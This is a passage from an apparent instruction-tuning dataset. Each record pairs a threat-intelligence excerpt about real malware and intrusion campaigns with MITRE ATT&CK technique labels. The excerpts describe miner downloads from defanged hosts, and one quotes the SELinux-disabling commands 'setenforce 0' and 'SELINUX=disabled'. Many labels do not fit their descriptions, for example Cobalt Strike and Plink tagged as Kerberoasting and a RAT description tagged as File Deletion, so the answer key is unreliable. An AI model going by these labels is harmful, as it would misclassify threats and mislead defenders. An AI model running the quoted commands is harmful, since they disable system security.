BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. CTU researchers identified an xxmm builder for xxmm (see Figure 2), which suggests that the threat actors customize the xxmm malware settings based on the target. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. After a few minutes, execute the malicious file on the system. Use malware to upload the large list of enumerated files to the C2 server. Use an uploader or other malware to send the archived files to an attacker-controlled server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity", + "output": "- T1080: Taint Shared Content" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If the user clicks on the link, he will be prompted to download a RAR file that contains the stage 1 malware/lure, which he will execute afterwards", + "output": "- T1204.002: User Execution - Malicious File\n- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Unit 42 has discovered activity involving threat actors responsible for the OilRig campaign with a potential link to a threat group known as GreenBug. Symantec first reported on this group back in January 2017, detailing their operations and using a custom information stealing Trojan called ISMDoor", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "spwebmember was written in Microsoft .NET and includes hardcoded values for client project names for data extraction", + "output": "- T1114.002: Email Collection - Remote Email Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The infection process is rather interesting, as it involves multiple layers of .NET assemblies that will eventually download the NanoCore remote administration tool (RAT) from a remote server and inject it into another process. In some instances, we have also seen the RemcosRAT malware family delivered as the final payload. The infection process not only downloads and executes a payload, but it also downloads and opens a decoy document to lower the recipient's suspicions of the entire process", + "output": "- T1055.002: Process Injection - Portable Executable Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "LookBack\u202fmalware is a remote access\u202fTrojan\u202fwritten in C++ that relies on a proxy communication tool to relay data\u202ffrom the infected host to a command and control IP", + "output": "- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "There are multiple ways for the operators to reach a Kobalos-infected machine. The method we\u2019ve seen the most is where Kobalos is embedded in the OpenSSH server executable (sshd) and will trigger the backdoor code if the connection is coming from a specific TCP source port. These variants either connect to a C&C server that will act as a middleman, or wait for an inbound connection on a given TCP port", + "output": "- T1205: Traffic Signaling" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Config.json\"\" is a mining config file for XMRig, an open-source Monero miner. The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. This configuration file contains the same actor pool and wallet information as the first. Lowerv2.sh\"\" and \"\"rootv2.sh\"\" are similar shell scripts that attempt to download and execute the mining malware components \"\"bashf\"\" and \"\"bashg,\"\" hosted on 118[.]24[.]150[.]172. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called \"\"XbashY\"\" from 3g2upl4pq6kufc4m[.]tk. Based on the config file it uses, it appears to be the Monero Silent Miner. This miner can be purchased online for $14 and targets malicious actors. The sample grabs the config file \"\"xmr.txt,\"\" which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn. Intriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system. So, while we can asses with high confidence that the payloads share some code base, we are still unsure of the exact relationship between Rocke and Iron Cybercrime Group\"", + "output": "- T1564.001: Hide Artifacts - Hidden Files and Directories" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Hello, I got kinsing on my main development box (ubuntu 20 lamp stack). NO docker NO redis NO phpunit How it got in, is a mystery. All I can tell is it came in via apache (kinsing was running as www-data and main kinsing executable in /tmp was owned by www-data). I am using Laravel 7.2.0 not sure are there any loop in the laravel", + "output": "- T1133: External Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This module intercepts HWP documents on an infected computer. The HWP file format is similar to Microsoft Word documents, but supported by Hangul, a South Korean word processing application from the Hancom Office bundle. Hancom Office is widely used in South Korea. The account is hardcoded in the module along with the master\u2019s e-mail to which it sends intercepted documents. It is interesting that the module does not search for all the HWP files on infected computer, but reacts only to those that are opened by the user and steals them. This behavior is very unusual for a document-stealing component and we do not see it in other malicious toolkits", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "RAR archiving \u2013 files are transferred to staging servers before exfiltration. Certutil \u2013 a command-line utility that can be exploited and used for various malicious purposes, such as to decode information, to download files, and to install browser root certificates. Adfind \u2013 a command-line tool that can be used to perform Active Directory queries. Csvde \u2013 can be used to extract Active Directory files and data. Ntdsutil \u2013 can be used as a credential-dumping tool. WMIExec \u2013 can be used for lateral movement and to execute commands remotely. It can be used to find information and execute code, and is frequently abused by malicious actors", + "output": "- T1119: Automated Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "LaZagne (SecurityRisk.LaZagne): A login/password retrieval tool - Mimikatz (Hacktool.Mimikatz): Tool designed to steal credentials - Gpppassword: Tool used to obtain and decrypt Group Policy Preferences (GPP) passwords - SniffPass (SniffPass): Tool designed to steal passwords by sniffing network traffic", + "output": "- T1040: Network Sniffing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Additionally, once infected, the malware cycles through a large list of command and control (C&C) servers embedded within the malware. It appears while the list is extensive, not all of the C&Cs are active and continue to beacon until a successful connection is established. Despite modifying a small part of itself while copying itself across the network as a means to evade detection, the operators have made no effort to change the C&C communication protocol since its first inception", + "output": "- T1049: System Network Connections Discovery\n- T1008: Fallback Channels" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This final payload is the ThreatNeedle loader running in memory. In addition, the malware saves the configuration data as a registry key encrypted in RC4", + "output": "- T1112: Modify Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "On a different system, operators dropped a legitimate copy of credwize.exe, the Microsoft Credential Backup and Restore Wizard, on disk and used it to execute the malicious library New.dll, another Turian variant", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "While the IronPython scripts are only the first part of the tool, the main task of loading malware is done by an embedded process injector. We dubbed this toolchain IronNetInjector, the blend of IronPython and the injector\u2019s internal project name NetInjector. In this blog, we describe the IronPython scripts and how they\u2019re used to load one or more payloads with the help of an injector", + "output": "- T1059.006: Command and Scripting Interpreter - Python" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "IAT hooking and inline hooking are generally known as userland rootkits. IAT hooking is a technique that malware uses to change the import address table. In contrast, with inline hooking, malware modifies the API function itself. In Figure 11, the malware FinFisher, performs IAT hooking by modifying where the CreateWindowEx points", + "output": "- T1056.004: Input Capture - Credential API Hooking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Our dynamic analysis showed Lokibot\u2019s behavior, including the benefits and drawbacks of several unpacking methods. Lokibot also used an infected system machine global unique identifier (GUID) value to generate a mutex (an MD5 hash) that acted as a flag to prevent itself from infecting the same machine again. The subject lines of the campaign messages usually started with or included the term \u201cproforma. The malicious attachment was a DOCX, with a file name that also included \u201cproforma\u201d in its pattern. TLP: WHITE https://www.us-cert.gov/tlpCharacteristicsLokibot is an information stealer; the main functionality of its binary is to collect system and application credentials, and user information to send back to the attacker. We then conducted a static analysis to examine Lokibot\u2019s techniques and targets. It starts from the tenth byte in the data section of the initial TCP POST request. We also noticed that the value of the sub key is the path to the file that Lokibot created after its initial execution. The binary\u2019s hardcoded strings provided data about the binary\u2019s characteristics, behavior, and main functionality.Section HeadersFrom the section headers and distribution of each section, the binary appears to be fairly normal. Figure 9Hollow Process; Manually Unpacking the First Stage BinaryWe tried to follow the binary with a debugger to determine where it unpacked itself in the memory, but Lokibot used a hollow process technique to obscure some of this activity", + "output": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The payload decrypted at the previous step is a PowerShell reflective loader. It is based on the script Invoke-ReflectivePEInjection.ps1 from the same PowerSploit framework. The executable is hardcoded in the script and is loaded directly into the memory of a randomly chosen process that is already running on the system", + "output": "- T1055: Process Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Before proceeding to file encryption operations, the ransomware force stops (\u201ckills\u201d) processes listed by process name in a hard-coded list within the encoded strings of the malware. A full list with assessed process function or relationship is provided in Appendix A of this report. While some of the referenced processes appear to relate to security or management software (e.g. Qihoo 360 Safeguard and Microsoft System Center), the majority of the listed processes concern databases (e.g. IBM Tivoli), or ICS-related processes", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "One notable difference is that this particular stager included functionality that allowed the stager to communicate with the command and control (C2) via an encrypted RC4 byte stream. In this sample, the threat actors' C2 server was the domain msdn[.]cloud", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The main idea here is that if you create a LNK to an executable or command, then use the ShowGroup method, the program will be executed. This is an undocumented behavior in Microsoft Windows", + "output": "- T1559.002: Inter-Process Communication - Dynamic Data Exchange" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Trickbot is installed as a scheduled task, using names like \u201cWinDotNet,\u201d \u201cGoogleTask,\u201d or \u201cSysnetsf\u201d to masquerade as legitimate-appearing processes. These point to various copies of TrickBot installed in the system, usually within the user profile under %USER_DIR%\\AppData\\Roaming\\ or a subdirectory. The subdirectories also use similarly misleading names like \u201cWinDefrag\u201d or \u201cNetSocket\u201d to appear innocuous. TrickBot may also be installed as a service with names like \u201cControlServiceA\u201d that points to a copy in the system drive root", + "output": "- T1036.004: Masquerading - Masquerade Task or Service\n- T1543.003: Create or Modify System Process - Windows Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "1) Establish persistence via the Startup folder or theRun registry key (some variants). 2) Inject itself to another process such as rundll32.exe and dllhost.exe (some variants). 3) Decrypt two blobs: Import Table and the loader configuration", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The adversary also used the commodity Cobalt Strike framework and Plink tunneling tool in many of these campaigns", + "output": "- T1558.003: Steal or Forge Kerberos Tickets - Kerberoasting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Lizar server application, meanwhile, is written using the .NET framework and runs on a remote Linux host, researchers said. It supports encrypted communications with the bot client", + "output": "- T1573: Encrypted Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The observed JSS Loader infection led to the download and execution of a setup VBScript from https[:]//petshopbook[.]com", + "output": "- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Once the registry value is created, the attackers simply wait for the occasional execution of dllhost.exe, which might happen naturally on a system. This execution triggers a process launch of wscript.exe configured to run the VBScript file dropped in step #4", + "output": "- T1546.012: Event Triggered Execution - Image File Execution Options Injection\n- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Each of the Silent Librarian lures ends with a very realistic looking closing signature containing contact information for the target library. This information is collected through open source research conducted by the threat actors. In some cases, all of the contact information can be found together on one webpage; however, some of the information is in different locations, indicating the actors are likely performing manual reconnaissance to gather the information", + "output": "- T1594: Search Victim-Owned Websites" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Hildegard searches for credential files on the host, as well as queries metadata for cloud-specific credentials", + "output": "- T1552.005: Unsecured Credentials - Cloud Instance Metadata API" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FIN6 also moved laterally to servers in the environment using RDP and configured them as malware \u201cdistribution\u201d servers. The distribution servers were used to stage the LockerGoga ransomware, additional utilities, and deployment scripts to automate installation of the ransomware. Mandiant identified a utility script named kill.bat that was run on systems in the environment. This script contained a series of anti-forensics and other commands intended to disable antivirus and destabilize the operating system. FIN6 automated the deployment of kill.bat and the LockerGoga ransomware using batch script files. FIN6 created a number of BAT files on the malware distribution servers with the naming convention xaa.bat, xab.bat, xac.bat, etc. These BAT files contained psexec commands to connect to remote systems and deploy kill.bat along with LockerGoga. FIN6 renamed the psexec service name to \u201cmstdc\u201d in order to masquerade as the legitimate Windows executable \u201cmsdtc", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Business info at outsidersecurity.nl . Introducing ROADtools - The Azure AD exploration framework . 15 minute read . Over the past 1.5 years I\u2019ve been doing quite a lot of exploration into Azure AD and how it works under the hood. So I set myself a few goals: - Provide tooling for both Red teams and Blue teams to explore all Azure AD data in an accessible way. Use asynchronous HTTP calls in Python to dump all available information in the Azure AD graph to this database. Where to get the data . Since Azure AD is a cloud service, there isn\u2019t a way to reverse engineer how it works, or a central repository where all the data is stored that you can access. While researching Azure and looking through the requests in the Azure Portal, at some point I noticed that the portal was calling a different version of the Azure AD Graph, the 1.61-internal version. This internal version of the Azure AD graph exposes much more data than any of the official API\u2019s that are offered by Microsoft. To create the object structure, ROADrecon uses the OData metadata definition that the Azure AD graph exposes. ROADrecon will by default pretend to be the Azure AD PowerShell module and will thus inherit its permissions to access the internal version of the Azure AD graph. Gathering all the data . The second step is data gathering, which the roadrecon gather command does. That being said, there is a setting in the deprecated MSOnline PowerShell module which prevents enumeration using the Azure AD graph, which is documented here", + "output": "- T1119: Automated Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After the variables are set, the command line script copies QlpxpQpOpDpnpRpC.ini to the executable name that has been picked for this run and then attempts to kill any legitimate process using the specified name before launching it. The name for the .ini file is randomized per archive, but almost always turns out to be that of the VNC server itself", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The launcher then configures several Registry values, including SecurityPasswordAES, that control how the remote access tool will work", + "output": "- T1550.002: Use Alternate Authentication Material - Pass the Hash\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The adversary used the built-in lateral movement possibilities in Cobalt Strike. Cobalt Strike has various methods for deploying its beacons at newly compromised systems. We have seen the adversary using SMB, named pipes, PsExec, and WinRM. They continue lateral movement and discovery in an attempt to identify the data of interest. This could be a webserver to carve data from memory, or a fileserver to copy IP, as we have both observed", + "output": "- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The SOMBRAT backdoor is packaged as a 64-bit Windows executable. It communicates with a configurable command and control (C2) server via multiple protocols, including DNS, TLS-encrypted TCP, and potentially WebSockets. Although the backdoor supports dozens of commands, most of them enable the operator to manipulate an encrypted storage file and reconfigure the implant. The backdoor's primary purpose is to download and execute plugins provided via the C2 server. In contrast to the SOMBRAT version published in November 2020, Mandiant observed additional obfuscation and armoring to evade detection, this SOMBRAT variant has been hardened to discourage analysis. Program metadata typically included by the compiler has been stripped and strings have been inlined and encoded via XOR-based routines", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If the file /usr/sbin/setenforce exists, the malware executes the command, setenforce 0. This command configures the system\u2019s Security-Enhanced Linux (SELinux) module, which provides support in the system's access control policies, into permissive mode \u2014 that is, setting the SELinux policy so that it is not enforced. If the system has the /etc/selinux/config file, it will write these commands into the file: SELINUX=disabled and SELINUXTYPE=targeted commands. The former disables the SELinux policy (or disallows one to be loaded), while the latter sets selected processes to run in confined domains", + "output": "- T1518.001: Software Discovery - Security Software Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE 